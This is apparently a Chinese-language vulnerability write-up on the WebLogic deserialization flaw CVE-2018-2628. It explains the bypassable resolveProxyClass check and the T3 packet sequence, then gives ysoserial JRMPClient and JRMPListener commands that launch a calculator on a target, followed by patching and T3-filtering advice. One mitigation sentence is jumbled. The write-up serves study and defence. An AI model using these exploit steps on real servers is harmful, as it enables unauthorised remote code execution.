Java反序列化漏洞CVE-2018-2628 分析

一、 前言

认识Java序列化与反序列化
定义：

序列化就是把对象的状态信息转换为字节序列(即可以存储或传输的形式)过程
　　反序列化即逆过程，由字节流还原成对象
　　注： 字节序是指多字节数据在计算机内存中存储或者网络传输时各字节的存储顺序。
且看接下来怎么一步步揭开反序列化漏洞利用的面纱的。（小白文）

二、CVE-2018-2628反序列化漏洞详情分析

在分析这个漏洞的时候，中间也看了好多前辈们写的有关Java反序列化漏洞分析的或详细或简略或比价有深度的文章。自己也琢磨了，虽然还没有动手写漏洞利用脚本，但是基本已经了解了反序列化漏洞从发现到利用的整个过程。其中也看了ysoserial-master通用利用工具的源码来加深理解。

(1) 反序列化漏洞利用方法

1.1为了更好的了解漏洞形成的原因，跟踪了脚本抓包分析以及反编译了源码来解开对java反序列化漏洞的疑惑

这部分是参考自别人针对这个漏洞的分析：来看看InboundMsgAbbrev中resolveProxyClass的实现，resolveProxyClass是处理rmi接口类型的，只判断了java.rmi.registry.Registry，其实随便找 一个rmi接口即可绕过。protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {String[] arr$ = interfaces;int len$ = interfaces.length;for(int i$ = 0; i$ < len$; ++i$) {String intf = arr$[i$];if(intf.equals("java.rmi.registry.Registry")) {throw new InvalidObjectException("Unauthorized proxy deserialization");}}return super.resolveProxyClass(interfaces);
}其实核心部分就是JRMP（Java Remote Method protocol），在这个PoC中会序列化一个RemoteObjectInvocationHandler，它会利用UnicastRef建立到远端的tcp连接获取RMI registry，加载回来再利用readObject解析，从而造成反序列化远程代码执行。

这里提供了主要漏洞出现位置，具体poc中payload构造方法、以及绕过接口限制。
1.2 数据包分析
在最开始不熟悉poc构造过程的时候，只看代码看不懂payload构造的是什么数据，就抓包进行了分析，在数据包中解析了大半部分的payload，之后就能理解整个漏洞的利用过程了。
1.2.1 构造t3协议包头

1.2.2 请求目标服务器ip

1.2.3 连接远程服务器接收序列化后payload

1.2.4 调用readObject反序列化payload，攻击目标服务器

（3） 漏洞位置/补丁分析

3.1 补丁中的漏洞相关代码

(4) poc测试/exp 构造

4.1 测试poc
4.1.1版本信息

4.1.2poc测试结果
经测试，必须先发送T3协议头数据包，再发送JAVA序列化数据包，才能使weblogic进行JAVA反序列化，进而触发漏洞。如果只发送JAVA序列化数据包，不先发送T3协议头数据包，无法触发漏洞。

4.2 构造exp
本地利用 ysoserial.exploit.JRMPListener构造了一个弹计算器的序列化payload，目标服务器加载回来解析，因为只是过滤了‘java.rmi.registry.Registry’这个接口的序列化数据，所以会调用readobject进行解析。就造成了远程代码执行。
4.2.1.首先生成用来请求：生成序列化攻击payload的服务器

java -jar ysoserial.jar JRMPClient xx.xx.xx.xx:xxxx >1
下图是网上exp开的监听端口。

4.2.2.替换payload
脚本这里替换刚刚自己生成的payload

4.2.3.先启动监听，再执行脚本，
java -cp ysoserial.jar ysoserial.exploit.JRMPListener xxx CommonsCollections1 calc.exe

直接执行.py脚本即可

4.2.4.目标主机执行远程命令：弹出计算器

4.3 exp核心部分
exp中都是序列化的流数据，核心部分就是RemoteObjectInvocationHandler，它会利用UnicastRef建立到远端的tcp连接获取RMI registry，加载回来再利用readObject解析，从而造成反序列化远程代码执行。

三、总结/修复建议

官方补丁
Oracle官方已经在4月18号的关键补丁更新中修复了此漏洞，受影响的用户请尽快升级更新进行防护。
可使用正版软件许可账户登录 https://support.oracle.com，下载最新补丁。
手工修复
若要利用该漏洞, 攻击者首先需要与WebLogic Server提供的T3服务端口建立SOCKET连接, 运维人员可通过控制T3协议的访问权限来临时阻断漏洞利用。
WebLogic Server 提供了名叫“weblogic.security.net.ConnectionFilterImpl”的默认连接筛选器。该连接筛选器可控制所有传入连接，通过修改此连问控制。接筛选器规则，可对T3及T3S协议进行访

四、参考

https://mp.weixin.qq.com/s/nNTw3HMnkX63d9ybdx3USQ